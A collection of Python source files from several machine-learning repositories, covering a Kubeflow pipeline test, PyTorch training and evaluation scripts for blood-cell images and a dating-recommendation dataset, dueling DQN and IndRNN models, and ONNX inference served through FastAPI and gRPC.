self.create_generator(params={"param1": 0.3, "param2": 42})
# when
with kfp.dsl.Pipeline(None) as dsl_pipeline:
self.generator_under_test.generate_pipeline(
"pipeline", "unittest-image", "Always"
)()
# then
env_values = {
e.name: e.value for e in dsl_pipeline.ops["pipeline"].container.env
}
assert "KUBEFLOW_RUN_ID" in env_values
assert env_values["KUBEFLOW_RUN_ID"] == "{{workflow.uid}}"
def create_generator(self, config=None, params=None, catalog=None):
if config is None:
config = {}
if params is None:
params = {}
if catalog is None:
catalog = {}
config_loader = MagicMock()
config_loader.get.return_value = catalog
context = type(
"obj",
(object,),
{
"env": "unittests",
"params": params,
"config_loader": config_loader,
"pipelines": {
"pipeline": Pipeline(
[
node(identity, "A", "B", name="node1"),
node(identity, "B", "C", name="node2"),
]
)
},
},
)
self.generator_under_test = OnePodPipelineGenerator(
config=PluginConfig(
{"host": "http://unittest", "run_config": config}
),
project_name="my-awesome-project",
context=context,
)
``` |
{
"source": "0shimax/Kftest",
"score": 2
} |
#### File: src/feature/metric_data_loader.py
```python
from pathlib import Path
import random
import numpy
import torch
from torchvision import datasets, transforms
from torch.utils.data import Dataset
from PIL import Image
import multiprocessing
from feature.utils import ImageTransform, GcsIO
class WBCDataset(Dataset):
def __init__(self, n_class, image_labels, root_dir,
subset="Dataset1", transform=ImageTransform(),
project="<your project id>", bucket_name="kf-test1234",
train=True):
super().__init__()
self.image_labels = image_labels
self.root_dir = root_dir
self.subset = subset
self.gcs_io = GcsIO(project, bucket_name)
self.transform = transform
self.n_class = n_class
self.train = train
self.n_relation = self.n_class**2
def __len__(self):
return len(self.image_labels)
def __getitem__(self, idx):
img_name, label = self.image_labels[idx]
image = self._read_image(img_name)
image = self.transform(image)
if self.train:
near_image = self._get_near_image(label)
far_image, far_label = self._get_far_image_and_label(label)
            # encode the (anchor, other) label pair as a unique id in [0, n_class**2);
            # multiplying by n_class-1 would let different pairs collide
            near_relational_tag = label*self.n_class + label
            far_relational_tag = label*self.n_class + far_label
label = torch.LongTensor([label])
far_label = torch.LongTensor([far_label])
near_relational_tag = torch.LongTensor([near_relational_tag])
far_relational_tag = torch.LongTensor([far_relational_tag])
return image, label, near_image, label, far_image, far_label, near_relational_tag, far_relational_tag
else:
return image, label
def _get_far_image_and_label(self, near_category):
idxs = numpy.where(self.image_labels[:,1]!=near_category)[0]
random.shuffle(idxs)
idx = idxs[0]
img_name, label = self.image_labels[idx]
image = self._read_image(img_name)
image = self.transform(image)
return image, label
def _get_near_image(self, near_category):
idxs = numpy.where(self.image_labels[:,1]==near_category)[0]
random.shuffle(idxs)
idx = idxs[0]
img_name = self.image_labels[idx][0]
image = self._read_image(img_name)
return self.transform(image)
def _read_image(self, img_name):
image_path = '/'.join([self.root_dir, self.subset, "{0:03}.bmp".format(img_name)])
image = self.gcs_io.load_image(image_path)
return image
def loader(dataset, batch_size, shuffle=True):
loader = torch.utils.data.DataLoader(
dataset,
batch_size=batch_size,
shuffle=shuffle,
num_workers=multiprocessing.cpu_count())
return loader
```
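A minimal sketch of wiring the dataset into the loader. The `(file id, class)` label layout mirrors what `test.py` below builds from the metadata CSV; the project and bucket names are placeholders:
```python
import numpy

# Made-up (image file id, class label) pairs for illustration.
image_labels = numpy.array([[1, 0], [2, 3], [3, 1]])
dataset = WBCDataset(5, image_labels, "data/segmentation_WBC-master",
                     project="my-gcp-project", bucket_name="my-bucket",
                     train=False)
batch_iter = loader(dataset, batch_size=2, shuffle=False)
```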
#### File: src/feature/utils.py
```python
import io
from torchvision import transforms
from google.cloud import storage
from pathlib import Path
from PIL import Image
class ImageTransform(object):
def __init__(self):
pass
def __call__(self, x):
normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225])
transform = transforms.Compose(
# [transforms.Resize(256),
# transforms.CenterCrop(224),
[transforms.Resize(76),
transforms.CenterCrop(64),
transforms.ToTensor(),
normalize,
])
return transform(x)
class GcsIO(object):
def __init__(self, project, bucket_name):
self.PROJECT = project
self.BUCKET_NAME = bucket_name
def upload_file(self, gcs_path, local_path):
client = storage.Client(self.PROJECT)
bucket = client.get_bucket(self.BUCKET_NAME)
blob = bucket.blob(gcs_path)
blob.upload_from_filename(local_path)
def download_file(self, gcs_path, local_path):
p_path = Path(local_path).parent
if not p_path.exists():
p_path.mkdir(parents=True)
client = storage.Client(self.PROJECT)
bucket = client.get_bucket(self.BUCKET_NAME)
blob = bucket.blob(gcs_path)
blob.download_to_filename(local_path)
def load_image(self, gcs_path):
client_storage = storage.Client(self.PROJECT)
bucket = client_storage.get_bucket(self.BUCKET_NAME)
blob = bucket.blob(gcs_path)
img = Image.open(io.BytesIO(blob.download_as_string()))
return img
```
#### File: Kftest/src/test.py
```python
from pathlib import Path
import argparse
import collections
import json
import numpy
import torch
import torch.nn as nn
import torch.nn.functional as F
import pandas
from sklearn.metrics import accuracy_score, confusion_matrix
from google.cloud import storage
from model.trans_NFCM import TransNFCM
from optimizer.radam import RAdam
from feature.metric_data_loader import WBCDataset, loader
from metric.utils import cossim, val
torch.manual_seed(555)
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
print("device:", device)
idx2label = {0:"Lymphocyte",
1:"Monocyte",
2:"Nuetrophil",
3:"Eosinophil",
4:"Basophil"}
def main(args):
n_relational_embeddings = args.n_class**2
n_tag_embeddings = args.n_class
in_ch, out_ch, emb_dim = 3, 128, 128
model = TransNFCM(in_ch, out_ch,
n_relational_embeddings, n_tag_embeddings,
embedding_dim=emb_dim).to(device)
    # build the GCS URL as a plain string: pathlib collapses "gs://" to "gs:/"
    image_label = pandas.read_csv(
        "gs://{}/{}/{}".format(
            args.bucket_name,
            args.data_root,
            args.metadata_file_name.format(args.subset))
    )
image_label = image_label.sample(frac=1, random_state=551)
image_label["class"] = image_label["class"] - 1
image_label = image_label.values
val_dataset = WBCDataset(args.n_class, image_label[:250], args.data_root,
project=args.project, bucket_name=args.bucket_name,
subset=args.subset, train=False)
test_dataset = WBCDataset(args.n_class, image_label[250:], args.data_root,
project=args.project, bucket_name=args.bucket_name,
subset=args.subset, train=False)
val_loader = loader(val_dataset, 1, shuffle=False)
test_loader = loader(test_dataset, 1, shuffle=False)
test_loader.dataset.gcs_io.download_file(args.resume_model,
args.out_dir+"/"+args.resume_model.split("/")[-1])
if Path(args.resume_model).exists():
print("load model:", args.resume_model)
        model.load_state_dict(torch.load(args.resume_model, map_location=device))
center_vec = val(args, model, val_loader, emb_dim=emb_dim)
test(args, model, test_loader, center_vec)
def test(args, model, data_loader, center_vec):
model.eval()
label_idxs = []
result_labels = []
with torch.no_grad():
for i, (image, cat) in enumerate(data_loader):
image = image.to(device)
cat = cat.to(device)
label_idxs.append(cat.item())
image_embedded_vec = model.predict(x=image, category=None)
            vec = F.softmax(image_embedded_vec, dim=1).squeeze(0).cpu().numpy()  # .cpu() so this also works on CUDA
result_labels.append(cossim(vec, center_vec))
write_metric(args, label_idxs, result_labels, args.n_class,
list(idx2label.values()), data_loader.dataset.gcs_io)
print("done")
def write_metric(args, target, predicted, n_class, class_names, gcs_io,
cm_file='confusion_matrix.csv'):
cm = confusion_matrix(target, predicted, labels=list(range(n_class)))
accuracy = accuracy_score(target, predicted)
data = []
for target_index, target_row in enumerate(cm):
for predicted_index, count in enumerate(target_row):
data.append((class_names[target_index], class_names[predicted_index], count))
df_cm = pandas.DataFrame(data, columns=['target', 'predicted', 'count'])
cm_file_path = '/'.join([args.out_dir, cm_file])
with open(cm_file_path, 'w') as f:
df_cm.to_csv(f, columns=['target', 'predicted', 'count'], header=False, index=False)
gcs_io.upload_file('{}/{}'.format(args.out_dir, cm_file), cm_file_path)
metadata = {
'outputs': [{
'type': 'confusion_matrix',
'format': 'csv',
'schema': [
{'name': 'target', 'type': 'CATEGORY'},
{'name': 'predicted', 'type': 'CATEGORY'},
{'name': 'count', 'type': 'NUMBER'},
],
'source': 'gs://{}/{}/{}'.format(args.bucket_name, args.out_dir, cm_file),
'labels': class_names,
}]
}
    # Write the metadata to JSON; pointing file_outputs at it in the DSL lets the confusion matrix be viewed from the KFP UI
with open(args.out_dir+'/mlpipeline-ui-metadata.json', 'w') as f:
json.dump(metadata, f)
metrics = {
'metrics': [{
'name': 'accuracy-score', # The name of the metric. Visualized as the column name in the runs table.
'numberValue': accuracy, # The value of the metric. Must be a numeric value.
'format': "PERCENTAGE", # The optional format of the metric. Supported values are "RAW" (displayed in raw format) and "PERCENTAGE" (displayed in percentage format).
}]
}
with open(args.out_dir+'/mlpipeline-metrics.json', 'w') as f:
json.dump(metrics, f)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--data-root', default="data/segmentation_WBC-master")
parser.add_argument('--metadata-file-name', default="Class_Labels_of_{}.csv")
parser.add_argument('--subset', default="Dataset1")
parser.add_argument('--project', default="<your project id>")
parser.add_argument('--bucket-name', default="kf-test1234")
parser.add_argument('--n-class', type=int, default=5, help='number of class')
parser.add_argument('--resume-model', default='export/wbc/NFCM_model.pth', help='path to trained model')
parser.add_argument('--out-dir', default='export/wbc', help='folder to output data and model checkpoints')
args = parser.parse_args()
    Path(args.out_dir).mkdir(parents=True, exist_ok=True)
main(args)
```
#### File: Kftest/src/train.py
```python
from pathlib import Path
import argparse
import collections
import numpy
import torch
import torch.nn as nn
import torch.nn.functional as F
import pandas
from google.cloud import storage
from model.trans_NFCM import TransNFCM
from optimizer.radam import RAdam
from feature.metric_data_loader import WBCDataset, loader
from feature.utils import GcsIO
torch.manual_seed(555)
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
print("device:", device)
idx2label = {0:"Lymphocyte",
1:"Monocyte",
2:"Nuetrophil",
3:"Eosinophil",
4:"Basophil"}
def main(args):
n_relational_embeddings = args.n_class**2
n_tag_embeddings = args.n_class
in_ch, out_ch, emb_dim = 3, 128, 128
model = TransNFCM(in_ch, out_ch,
n_relational_embeddings, n_tag_embeddings,
embedding_dim=emb_dim).to(device)
optimizer = RAdam(model.parameters(), weight_decay=1e-3)
    # build the GCS URL as a plain string: pathlib collapses "gs://" to "gs:/"
    image_label = pandas.read_csv(
        "gs://{}/{}/{}".format(
            args.bucket_name,
            args.data_root,
            args.metadata_file_name.format(args.subset))
    )
image_label = image_label.sample(frac=1, random_state=551)
image_label["class"] = image_label["class"] - 1
image_label = image_label.values
train_dataset = WBCDataset(args.n_class, image_label[:250], args.data_root,
project=args.project, bucket_name=args.bucket_name,
subset=args.subset, train=True)
train_loader = loader(train_dataset, args.batch_size)
train(args, model, optimizer, train_loader)
def train(args, model, optimizer, data_loader, model_name="NFCM_model.pth"):
model.train()
for epoch in range(args.epochs):
for i, (image, cat, near_image, near_cat, far_image, far_cat, near_relation, far_relation) in enumerate(data_loader):
image = image.to(device)
cat = cat.to(device)
near_image = near_image.to(device)
near_cat = near_cat.to(device)
far_image = far_image.to(device)
far_cat = far_cat.to(device)
near_relation = near_relation.to(device)
far_relation = far_relation.to(device)
model.zero_grad()
optimizer.zero_grad()
loss = model(image, near_image, image, far_image,
cat, near_cat, cat, far_cat,
near_relation, far_relation).sum()
loss.backward()
optimizer.step()
print('[{}/{}][{}/{}] Loss: {:.4f}'.format(
epoch, args.epochs, i,
len(data_loader), loss.item()))
model_path = args.out_dir+"/"+model_name
torch.save(model.state_dict(), model_path)
data_loader.dataset.gcs_io.upload_file(model_path, model_path)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--data-root', default="data/segmentation_WBC-master")
parser.add_argument('--metadata-file-name', default="Class_Labels_of_{}.csv")
parser.add_argument('--subset', default="Dataset1")
parser.add_argument('--project', default="<your project id>")
parser.add_argument('--bucket-name', default="kf-test1234")
parser.add_argument('--n-class', type=int, default=5, help='number of class')
parser.add_argument('--batch-size', type=int, default=32, help='input batch size')
parser.add_argument('--epochs', type=int, default=30, help='number of epochs to train for')
parser.add_argument('--out-dir', default='export/wbc', help='folder to output data and model checkpoints')
args = parser.parse_args()
    Path(args.out_dir).mkdir(parents=True, exist_ok=True)
main(args)
``` |
{
"source": "0shimax/load-testing-of-api-server",
"score": 2
} |
#### File: fastapi_server/app/prediction.py
```python
from typing import ByteString
import botocore
from logging import getLogger
import onnxruntime as rt
from models import Features
from models import PredictionResult
logger = getLogger("uvicorn.access")
class Classifier(object):
session = None
float_input_name = None
categorical_input_name = None
label_name = None
def __init__(
self,
s3_client: botocore.client.BaseClient = None,
s3_bucket: str = None,
s3_bucket_key: str = None,
model_file_path: str = None
):
logger.info("Initializing model...")
self.s3_client = s3_client
self.s3_bucket = s3_bucket
self.s3_bucket_key = s3_bucket_key
self.model_file_path = model_file_path
self.load_model()
    def _read_model_from_s3(self) -> ByteString:
        # read the whole body up front: InferenceSession expects bytes, not a boto3 StreamingBody
        return self.s3_client.get_object(
            Bucket=self.s3_bucket,
            Key=self.s3_bucket_key)["Body"].read()
def _build_session(self) -> rt.InferenceSession:
if self.s3_bucket:
logger.info("Fetching model file from S3...")
return rt.InferenceSession(self._read_model_from_s3())
else:
logger.info("Fetching model file from Local...")
return rt.InferenceSession(self.model_file_path)
def load_model(self) -> None:
logger.info("Loading model...")
logger.info("Building session...")
self.session = self._build_session()
logger.info("Session build Done.")
self.float_input_name = self.session.get_inputs()[0].name
self.categorical_input_name = self.session.get_inputs()[1].name
self.label_name = self.session.get_outputs()[1].name
logger.info("Model load Done.")
def predict(self, data: Features) -> PredictionResult:
inputs = {
self.float_input_name: Features.to_numpy(data.float_features),
self.categorical_input_name: Features.to_numpy(data.categorical_features),
}
predicted = self.session.run([self.label_name], inputs)[0]
return PredictionResult(**{"predicted": [v[1] for v in predicted]})
```
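A sketch of how this classifier might be served through a FastAPI route; the endpoint path and the local model file are assumptions, not part of the original repository:
```python
# Hypothetical wiring; "/predict" and "model.onnx" are assumptions.
from fastapi import FastAPI
from models import Features, PredictionResult

app = FastAPI()
classifier = Classifier(model_file_path="model.onnx")

@app.post("/predict")
def predict(features: Features) -> PredictionResult:
    return classifier.predict(features)
```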
#### File: app/ml/client.py
```python
import asyncio
import logging
import grpc
from onnxGrpcServer_pb2 import Features, UpdateParams
from onnxGrpcServer_pb2_grpc import CTCVInferenceServicerStub
import input_data
import time
async def request(stub, payloads):
start = time.perf_counter()
responses = stub.Predict(iter(payloads))
while True:
response = await responses.read()
if response == grpc.aio.EOF:
break
# print(f"responce: {response.prob}")
print("net time[ms]:", time.perf_counter() - start)
async def run():
async with grpc.aio.insecure_channel('localhost:50051') as channel:
stub = CTCVInferenceServicerStub(channel)
payloads = []
for i in range(10):
payloads.append(Features(**input_data.features_one[i%2]))
await request(stub, payloads)
async def update():
async with grpc.aio.insecure_channel('localhost:50051') as channel:
stub = CTCVInferenceServicerStub(channel)
        # UpdateModel is a unary RPC, so await it once instead of polling for EOF
        response = await stub.UpdateModel(UpdateParams(param="updating"))
        print(response)
if __name__ == '__main__':
logging.basicConfig()
asyncio.run(run())
# asyncio.run(update())
``` |
{
"source": "0shimax/Pytorch-DRN",
"score": 3
} |
#### File: src/feature/eme_data_loader.py
```python
from pathlib import Path
import pandas as pd
import numpy as np
import random
import torch
from torch.utils.data import Dataset
from sklearn.model_selection import train_test_split
def get_id_columns(df):
user_and_target_id_columns = ["user_id", "target_user_id"]
return df[user_and_target_id_columns]
def extranct_interacted_user_rows(df):
tmp = df[["user_id", "label"]].groupby('user_id').sum()
interacted_user_id = tmp[tmp.label>0].reset_index()
return df[df.user_id.isin(interacted_user_id.user_id)]
def get_ethnicity_columns(df):
ethnicity_user = df.ethnicity_user
ethnicity_target = df.ethnicity_target
ethnicity_columns = [c for c in df.columns if "ethnicity_" in c]
df.drop(ethnicity_columns, axis=1, inplace=True)
df = df.assign(ethnicity_user=ethnicity_user,
ethnicity_target=ethnicity_target)
return df
def calculate_user_features(df):
c_id = 'user_id'
user_feature_columns = [c for c in df.columns
if '_user' in c and 'target_user_id' != c]
user_features = df.groupby(c_id)[user_feature_columns].head(1)
user_features[c_id] = df.loc[user_features.index].user_id
return user_features
def calculate_target_features(df):
c_id = 'target_user_id'
target_feature_columns =\
[c for c in df.columns.values if '_target' in c]
target_features = df[[c_id] + target_feature_columns]
return target_features
def calcurate_target_clicked(df):
result = df[['target_user_id', 'label']]\
.groupby('target_user_id')\
.agg(['sum', 'count'])\
.reset_index()
result.columns = ['target_user_id', 'label_sum', 'label_cnt']
result = result.assign(label_rate=result.label_sum/result.label_cnt)
result.index = df.groupby('target_user_id').head(1).index
return result
def get_target_ids_for_train_input(squewed_user_target_labels,
valued_target_idxs, n_high, n_low):
    # Return every index (early return: the sampling logic below is currently disabled)
return squewed_user_target_labels.index.values
n_total = n_high + n_low
high_rate_flag = squewed_user_target_labels.label > 0
if len(valued_target_idxs) >= n_total:
idxs = np.random.permutation(len(valued_target_idxs))[:n_total]
return valued_target_idxs[idxs]
query = ~squewed_user_target_labels.index.isin(valued_target_idxs)
query &= high_rate_flag
n_rest = n_total - len(valued_target_idxs)
if n_rest == 1:
hight = squewed_user_target_labels[query].sample(n_rest).index.values
return np.concatenate([valued_target_idxs, hight])
m_n_high = int(n_rest * n_high / n_total)
m_n_low = n_rest - m_n_high
hight = squewed_user_target_labels[query].sample(m_n_high, replace=True).index.values
low = squewed_user_target_labels[
squewed_user_target_labels.label == 0].sample(m_n_low, replace=True).index.values
idxs = np.concatenate([valued_target_idxs, hight, low])
return idxs
def get_target_ids_for_test_input(squewed_user_target_labels, n_high, n_low):
    # Return every index (early return: the sampling logic below is currently disabled)
return squewed_user_target_labels.index.values
n_total = n_high + n_low
high_rate_flag = squewed_user_target_labels.label > 0
if sum(high_rate_flag) < n_high:
hight = squewed_user_target_labels[high_rate_flag].index.values
n_low = n_total - sum(high_rate_flag)
else:
hight = squewed_user_target_labels[high_rate_flag].sample(n_high).index.values
low = squewed_user_target_labels[
squewed_user_target_labels.label == 0].sample(n_low, replace=True).index.values
idxs = np.concatenate([hight, low])
return idxs
def get_target_ids_for_input(squewed_user_target_labels,
valued_target_idxs, n_high, n_low, train=True):
if train:
return get_target_ids_for_train_input(squewed_user_target_labels, valued_target_idxs, n_high, n_low)
else:
return get_target_ids_for_test_input(squewed_user_target_labels, n_high, n_low)
class OwnDataset(Dataset):
def __init__(self, file_name, root_dir, n_high, n_low,
subset=False, transform=None, train=True, split_seed=555):
super().__init__()
print("Train:", train)
self.file_name = file_name
self.root_dir = root_dir
self.transform = transform
self.n_high = n_high
self.n_low = n_low
self._train = train
self.split_seed = split_seed
self.prepare_data()
self.user_features_orig = self.user_features
def __len__(self):
return len(self.user_and_target_ids)
def reset(self):
self.user_features = self.user_features_orig
def prepare_data(self):
data_path = Path(self.root_dir, self.file_name)
eme_data = pd.read_csv(data_path)
extracted_interacted_rows = extranct_interacted_user_rows(eme_data)
unique_user_ids = extracted_interacted_rows.user_id.unique()
train_user_ids, test_user_ids = train_test_split(unique_user_ids,
random_state=self.split_seed,
shuffle=True,
test_size=0.2)
if self._train:
_data = eme_data[eme_data.user_id.isin(train_user_ids)]
self.user_features = calculate_user_features(_data)
self.user_and_target_ids = get_id_columns(_data)
self.rewards = eme_data[["user_id", "target_user_id", "label"]]
self.target_features_all = calculate_target_features(eme_data) # _data
else:
_data = eme_data[eme_data.user_id.isin(test_user_ids)]
self.user_and_target_ids = get_id_columns(_data)
self.user_features = calculate_user_features(_data)
self.rewards = eme_data[["user_id", "target_user_id", "label"]]
self.target_features_all = calculate_target_features(eme_data)
print("user", self.user_features.shape)
print("target", len(self.target_features_all.target_user_id.unique()))
def __getitem__(self, idx):
ids = self.user_and_target_ids.iloc[idx].values
current_user_id = ids[0]
user_feature = self.user_features[self.user_features.user_id == current_user_id]
user_feature = user_feature.copy().drop("user_id", axis=1)
user_feature = user_feature.astype(np.float32).values
user_feature = user_feature.reshape(-1)
query = (self.rewards.user_id == current_user_id)
query &= (self.rewards.label == 1)
valued_target_idxs = self.rewards[query].index.values
        # TODO: rename this variable later
squewed_user_target_labels =\
self.rewards.groupby("target_user_id").head(1)
target_idxs = get_target_ids_for_input(
squewed_user_target_labels, valued_target_idxs,
self.n_high, self.n_low, self._train)
target_features = self.target_features_all.loc[target_idxs].copy().reindex()
target_ids = target_features.target_user_id.values
target_features =\
target_features.copy().drop("target_user_id", axis=1)
target_features = target_features.astype(np.float32).values
eliminate_teacher = self.target_features_all.loc[valued_target_idxs].copy().reindex()
eliminate_teacher_ids = eliminate_teacher.target_user_id.values
eliminate_teacher_val = target_ids == eliminate_teacher_ids[0]
for v in eliminate_teacher_ids[1:]:
eliminate_teacher_val += target_ids == v
eliminate_teacher_val = eliminate_teacher_val.astype(np.float32)
return (torch.FloatTensor(user_feature),
torch.FloatTensor(target_features),
current_user_id,
target_ids,
eliminate_teacher_val)
def get_reward(self, current_user_id, target_ids):
query_user = self.rewards.user_id == current_user_id
query_target = self.rewards.target_user_id.isin(target_ids)
query = (query_user) & (query_target)
reward = self.rewards[query].label.values
if len(reward) == 0:
return 0.
else:
return float(reward.max())
def loader(dataset, batch_size, shuffle=True):
loader = torch.utils.data.DataLoader(
dataset,
batch_size=batch_size,
shuffle=shuffle,
num_workers=0)
return loader
```
#### File: src/model/ddqn_for_all.py
```python
import torch
import torch.nn as nn
from model.swichable_normalization import SwitchNorm1d
def inner(aa, bb):
return (aa * bb.unsqueeze(dim=1).expand(aa.shape)).sum(dim=2)
class ValueNet(nn.Module):
def __init__(self, dim_in, action_num):
super().__init__()
self.fcb1 = nn.Sequential(
nn.Linear(dim_in, 64),
# SwitchNorm1d(192),
nn.ReLU())
self.fcb2 = nn.Sequential(
nn.Linear(64, 128),
# SwitchNorm1d(64),
nn.ReLU())
self.fcb3 = nn.Sequential(
nn.Linear(256*4, 256*6),
# SwitchNorm1d(64),
nn.ReLU())
self.fc1 = nn.Linear(128, 128)
def forward(self, user_feature):
h = self.fcb1(user_feature)
h = self.fcb2(h)
# h = self.fcb3(h)
out = self.fc1(h)
return out
class AdvantageNet(nn.Module):
def __init__(self, dim_in, action_num):
super().__init__()
self.n_out_vec = 128
self.fcb1 = nn.Sequential(
nn.Linear(dim_in*2, 128),
# SwitchNorm1d(128),
nn.ReLU())
self.fcb2 = nn.Sequential(
nn.Linear(128, 128),
# SwitchNorm1d(64),
nn.ReLU())
self.fcb3 = nn.Sequential(
nn.Linear(64, 32),
# SwitchNorm1d(64),
nn.ReLU())
self.fc1 = nn.Linear(128, self.n_out_vec)
def forward(self, user_feature, target_features):
# print(user_feature.shape, target_features.shape)
n_bach, n_feature = user_feature.shape
expanded_shape = list(target_features.shape[:2])+[user_feature.shape[-1]]
uf = user_feature.unsqueeze(dim=1).expand(expanded_shape)
n_features = target_features.shape[-1] + user_feature.shape[-1]
# print(uf.shape, target_features.shape, n_features)
x = torch.cat([uf, target_features], dim=2).view(-1, n_features)
h = self.fcb1(x)
h = self.fcb2(h)
# h = self.fcb3(h)
out = self.fc1(h)
return out.view(n_bach, -1, self.n_out_vec)
class Model(nn.Module):
"""
dueling network
"""
def __init__(self, dim_in, action_num):
super().__init__()
self.value_net = ValueNet(dim_in, action_num)
self.advantage_net = AdvantageNet(dim_in, action_num)
def forward(self, observation, target_features):
# user_feature, content_id = observation
user_feature = observation
v = self.value_net(user_feature)
a = self.advantage_net(user_feature, target_features)
q = inner(a, v)
# print("q:", q.shape)
return q.view(q.size(0), -1)
def save(self, path, step, optimizer):
torch.save({
'step': step,
'state_dict': self.state_dict(),
'optimizer': optimizer.state_dict()
}, path)
def load(self, checkpoint_path, optimizer=None):
checkpoint = torch.load(checkpoint_path)
step = checkpoint['step']
self.load_state_dict(checkpoint['state_dict'])
if optimizer is not None:
optimizer.load_state_dict(checkpoint['optimizer'])
```
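A quick smoke test of the dueling network with random tensors (the sizes are arbitrary):
```python
import torch

# 4 users with 16 features each, 6 candidate targets per user.
model = Model(dim_in=16, action_num=6)
user = torch.rand(4, 16)
targets = torch.rand(4, 6, 16)
q = model(user, targets)
print(q.shape)  # torch.Size([4, 6])
```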
#### File: src/model/ddqn.py
```python
import torch
import torch.nn as nn
from model.swichable_normalization import SwitchNorm1d
class ValueNet(nn.Module):
def __init__(self, dim_in, action_num):
super().__init__()
h_dim = action_num
self.fcb1 = nn.Sequential(
nn.Linear(dim_in, h_dim),
# SwitchNorm1d(h_dim),
nn.ReLU())
self.fcb1_1 = nn.Sequential(
nn.Linear(256, 256*2),
# SwitchNorm1d(192),
nn.ReLU())
self.fcb2 = nn.Sequential(
nn.Linear(h_dim, h_dim),
# SwitchNorm1d(h_dim),
nn.ReLU())
self.fcb3 = nn.Sequential(
nn.Linear(h_dim, h_dim),
# SwitchNorm1d(h_dim),
nn.ReLU())
self.fc1 = nn.Linear(h_dim, action_num)
def forward(self, user_feature):
h = self.fcb1(user_feature)
# h = self.fcb1_1(h)
h = self.fcb2(h)
h = self.fcb3(h)
out = self.fc1(h)
return out
class AdvantageNet(nn.Module):
def __init__(self, dim_in, action_num):
super().__init__()
self.fcb1 = nn.Sequential(
nn.Linear(dim_in*2, 128),
# SwitchNorm1d(128),
nn.ReLU())
self.fcb2 = nn.Sequential(
nn.Linear(128, 64),
# SwitchNorm1d(64),
nn.ReLU())
self.fcb3 = nn.Sequential(
nn.Linear(64, 32),
# SwitchNorm1d(32),
nn.ReLU())
self.fc1 = nn.Linear(32, 1)
def forward(self, user_feature, target_features):
n_bach, n_feature = user_feature.shape
expanded_shape = list(target_features.shape[:2])+[user_feature.shape[-1]]
uf = user_feature.unsqueeze(dim=1).expand(expanded_shape)
n_features = target_features.shape[-1] + user_feature.shape[-1]
# print(uf.shape, target_features.shape, n_features)
x = torch.cat([uf, target_features], dim=2).view(-1, n_features)
h = self.fcb1(x)
h = self.fcb2(h)
h = self.fcb3(h)
out = self.fc1(h)
return out.view(n_bach, -1)
class Model(nn.Module):
"""
dueling network
"""
def __init__(self, dim_in, action_num):
super().__init__()
self.value_net = ValueNet(dim_in, action_num)
self.advantage_net = AdvantageNet(dim_in, action_num)
def forward(self, user_feature, target_features):
# print(user_feature.shape, target_features.shape)
v = self.value_net(user_feature)
a = self.advantage_net(user_feature, target_features)
        q = v + (a - a.mean(dim=1, keepdim=True))  # center the advantage over actions (dueling aggregation)
return q.view(q.size(0), -1)
def save(self, path, step, optimizer):
torch.save({
'step': step,
'state_dict': self.state_dict(),
'optimizer': optimizer.state_dict()
}, path)
def load(self, checkpoint_path, optimizer=None):
checkpoint = torch.load(checkpoint_path)
step = checkpoint['step']
self.load_state_dict(checkpoint['state_dict'])
if optimizer is not None:
optimizer.load_state_dict(checkpoint['optimizer'])
``` |
{
"source": "0shimax/pytorch-EncNet",
"score": 3
} |
#### File: src/model/utils.py
```python
import torch
from torch import nn
def calculate_l1_loss(output, target, lagrange_coef=0.0005):
l1_crit = nn.L1Loss(size_average=False) # SmoothL1Loss
reg_loss = l1_crit(output.argmax(dim=1).float(), target.float())
return lagrange_coef * reg_loss
def smooth_in(model):
    # subtract small uniform noise from every parameter and remember it for later restoration
    l_noise = []
    for p in model.parameters():
        noise = torch.FloatTensor(p.shape).uniform_(-.01, .01)
        p.data -= noise
        l_noise.append(noise)
    return l_noise
def smooth_out(model, l_noise):
    # add the stored noise back, restoring the parameters perturbed by smooth_in
    for p, noise in zip(model.parameters(), l_noise):
        p.data += noise
``` |
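These helpers implement a perturb-and-restore pattern: evaluate the model at a noise-shifted point in parameter space, then undo the shift. A minimal sketch of the intended call order, using a stand-in model:
```python
import torch
from torch import nn

# Tiny stand-in model and data, just to exercise the helpers.
model = nn.Linear(8, 3)
inputs, targets = torch.rand(4, 8), torch.randint(0, 3, (4,))

l_noise = smooth_in(model)                  # perturb parameters in place
loss = nn.functional.cross_entropy(model(inputs), targets)
smooth_out(model, l_noise)                  # restore the original parameters
```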
{
"source": "0shimax/pytorch-examples",
"score": 3
} |
#### File: 0shimax/pytorch-examples/ind_rnn_net.py
```python
import torch
import torch.nn.functional as F
from torch.nn.parameter import Parameter
from torch.autograd import Variable
import numpy
class IndRNN(torch.nn.Module):
def __init__(self, num_input_units, num_units,
recurrent_max_abs=25., non_linearity=F.relu):
super().__init__()
recurrent_max_abs = min(recurrent_max_abs, 1.0 / numpy.sqrt(num_units))
self.input_kernel = Parameter(torch.zeros(num_units, num_input_units))
self.recurrent_kernel = Parameter(
torch.Tensor(num_units,).uniform_(
-recurrent_max_abs, recurrent_max_abs))
self.bias = Parameter(torch.zeros(num_units,))
self.non_linearity = non_linearity
self.num_units = num_units
self.recurrent_max_abs = recurrent_max_abs
self.reset_state()
def reset_state(self):
self.h = Variable(torch.zeros(self.num_units))
def set_hidden_state(self, state):
self.h = state
def clip_recurrent_kernel(self):
self.recurrent_kernel.data.copy_(
torch.clamp(self.recurrent_kernel.data,
max=self.recurrent_max_abs,
min=-self.recurrent_max_abs))
def forward(self, x):
        self.clip_recurrent_kernel()
        output = self.non_linearity(
            F.linear(x, self.input_kernel, self.bias)
            + self.recurrent_kernel * self.h)  # element-wise recurrence (torch.nn.functional has no mul)
# self.clip_recurrent_kernel()
# recurrent_update = self.h.mul(
# self.recurrent_kernel.expand_as(self.h))
# gate_inputs += recurrent_update.expand_as(gate_inputs)
# gate_inputs += self.bias.expand_as(gate_inputs)
# output = self.non_linearity(gate_inputs)
return output
class EncDec(torch.nn.Module):
def __init__(self, in_size, h_unit_size, slot_size, memory_size):
super().__init__()
self.encorder = IndRNN(in_size, h_unit_size)
self.decorder = IndRNN(in_size, h_unit_size)
self.hidden_to_output = torch.nn.Linear(h_unit_size, in_size)
self.is_train = True
def reset_state(self):
self.encorder.reset_state()
self.decorder.reset_state()
def train_step(self, xs, ys):
for time_idx in reversed(range(1, xs.shape[1])):
dec_h = self.decorder(xs[:, time_idx])
out = self.hidden_to_output(dec_h)
ys.append(out.data)
